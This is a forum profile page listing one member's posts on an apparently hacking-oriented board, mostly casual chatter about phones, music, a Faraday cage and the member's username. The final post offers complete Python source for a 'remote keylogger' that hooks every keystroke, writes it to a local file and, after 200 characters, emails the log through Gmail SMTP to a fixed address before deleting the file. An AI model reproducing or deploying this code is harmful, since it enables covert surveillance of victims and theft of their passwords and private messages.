Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - xenophilius

Pages: [1]
1
Mobile Hacking / Re: Buying a new smartphone
« on: February 27, 2016, 09:16:18 pm »
check out this website:
http://www.gsmarena.com/
it contains specs, ratings, reviews and price range of smartphones.

Personally I would recommend a sony phone. Sleek and classy design. Feels good in the hands. Waterproof etc...

2
General discussion / Re: Your favorite Coding/Hacking/Gaming Music?
« on: February 25, 2016, 10:00:29 pm »
Depends on the mood.

While coding, need to concentrate so something cool:

Armin Van Buuren - A state of trance

After coding testing and debugging something a bit more energetic:

Some House music - Hardwell, Dyro etc...

I don't like to listen to the same music for one week on consecutive days. I get bored.

3
Science / Male to female surgery
« on: December 14, 2015, 08:35:59 pm »
Amazingly the transgender can experience orgasm with his/her brand new vagina!
https://www.youtube.com/watch?v=nvU6qsLfAuE

4
Tutorials / Re: The Faraday Cage - A Must In Today's Society.
« on: December 11, 2015, 10:26:55 pm »
Cool. Yet, if an asshole gets the crazy idea to pass a varying magnetic field through your room causing eddy currents to be induced in the metal foils. Hence turning your room into a furnace. How could such attacks be prevented?

5
General discussion / Re: What Inspired You?
« on: December 11, 2015, 10:45:07 am »
My inspiration came from a screwdriver which I stole from my grandpa when I was about 6. It allowed me dissamble my toys and look inside. The dynamos, gears, bulbs and how they work together was very interesting to me. Soon every single toy that I owned were "screwless".

Then one day my mother bought a computer pre-installed with windows XP. I did not dare opening the CPU since I got so many warnings not to do so. There was no one to teach me how to use a computer so I was messing around with it. Uninstalling softwares here and there, and installing others. The computer ended up with many viruses which I did not understand then. The computer had to be reformatted many times over by the seller which was kinda covered by the guarantee. Nobody kept me from messing with the computer so I continued to do so and unknowingly I was teaching myself how to use a computer. Then the internet came ...

6
General discussion / Re: Lets talk about names?
« on: December 06, 2015, 01:48:25 pm »
xeno -  relating to foreigners, stranger
phil - love
ius - latin suffix

inspired by luna lovegood's father's name. though the name sounds aggressive it actually has a more peaceful meaning.

7
Scripting Languages / Re: [python]remote python keylogger
« on: August 02, 2013, 02:13:47 pm »
Quote
Your wrote it yourself ?

yeah i wrote it myself and used the example code of pyHook to get started.

8
Scripting Languages / [python]remote python keylogger
« on: August 02, 2013, 08:55:24 am »
this is a python keylogger that records keystrokes and sends a log of 200 words to a mailing address.

Code: (Python) [Select]
#download necesssry modules
import pythoncom, pyHook       

def OnKeyboardEvent(event):
   
    global text           
    global lngth
   
    if event.KeyID == 13:       
        text = '''
'''                   
    elif event.KeyID == 165:
        text = '[alt]'
    elif event.KeyID == 8:
        text = '[bckspc]'
    elif event.KeyID == 46:
        text = '[dlt]'   
    elif event.KeyID == 160:
        text = '[lshft]'
    elif event.KeyID == 161:
        text = '[rshft]'   
    elif event.KeyID == 38:
        text ='[up]'
    elif event.KeyID == 39:
        text = '[rght]'
    elif event.KeyID == 37:
        text ='[lft]'
    elif event.KeyID ==40:
        text = '[dwn]'   
    else:
        text = chr(event.Ascii)
    #creates a .txt file, registers logs
    logger = open('logs.txt', 'a')   
    logger.write(text)
    logger.close()
     
    d = open('logs.txt', 'r')
    data = d.read()
    d.close()
    #counts number of characters
    lngth=len(data)           
    #when 200 words is exceeded email is sent   
    if lngth >= 200:       
       
       
        import smtplib
        fromaddr = 'sender@gmail.com'
        toaddrs = 'receiver@gmail.com'
        msg = data

        username = 'sender@gmail.com'
        password = 'password'

        server = smtplib.SMTP('smtp.gmail.com:587') 
        server.starttls() 
        server.login(username,password) 
        server.sendmail(fromaddr, toaddrs, msg) 
        server.quit() 
        #example included for a gmail account
        import os
        #deletes logs after sending and recreates another file
        os.remove('logs.txt')   
   
    return True     

hm = pyHook.HookManager()       
hm.KeyDown = OnKeyboardEvent   
hm.HookKeyboard()           
 

Pages: [1]